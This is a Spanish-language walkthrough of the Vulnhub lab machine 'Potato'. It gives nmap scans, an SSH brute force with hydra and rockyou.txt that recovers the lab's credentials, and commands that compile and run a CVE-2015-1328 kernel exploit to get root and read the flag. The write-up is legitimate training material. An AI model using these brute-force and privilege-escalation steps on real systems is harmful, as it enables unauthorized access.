Post

Vulnhub - Potato

Máquina Linux de nivel Easy de Vulnhub.

Técnicas usadas: Brute Force, Kernel Exploitation (CVE-2015-1328)

Fase de Reconocimiento 🧣

a. Enumeramos los puertos que están abiertos.

  • nmap -p- -sS -Pn -n <IP> -oG puertos

b. Vemos las versiones de los servicios que se están ejecutando en los puertos**

  • nmap -p<Ports> -sCV <IP> -oN versiones

c. Después de hacer fuzzing por directorios, fichero .php, zip, php.bak, .conf, únicamente encontramos info.php el cual no tiene información que nos permita acceder a la Máquina Víctima, por lo que el último recurso es realizar fuerza bruta sobre el servicio SSH y con la pista que nos dan:

1
Hint: "If you ever get stuck, try again with the name of the lab"
  • Es decir, usaremos hydra con el usuario potato (Nombre del Laboratorio) y usaremos el diccionario rockyou.txt

    1
    2
    3
    
      root@kali> hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://<IP>:7120 -t 4
    
      [7120][ssh] host: 192.168.100.23   login: potato   password: letmein
    
    • :7120 Puerto del servicio SSH en la máquina.
    • -t 4 Realizamos 4 peticiones en paralelo, ya que, si hacemos más de 4 tendremos conflictos con este servicio.

d. Nos autenticamos en el servicio SSH con las credenciales potato:letmein

1
root@kali> ssh potato@192.168.100.23 -p 7120

Escalada de Privilegios 💹

a. La versión del kernel es antigua

1
2
potato@ubuntu:~$ uname -a
Linux ubuntu 3.13.0-24-generic
  • Al buscar por vulnerabilidades llegamos a exploit

b. Guardamos el exploit en un archivo para luego compilarlo

1
2
3
4
5
6
7
8
potato@ubuntu:~$ gcc backup.c -o backup
potato@ubuntu:~$ chmod +x backup
potato@ubuntu:~$ ./backup

# bash
root@ubuntu:/home/potato# cd /root
root@ubuntu:/root# cat proof.txt 
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b
This post is licensed under CC BY 4.0 by the author.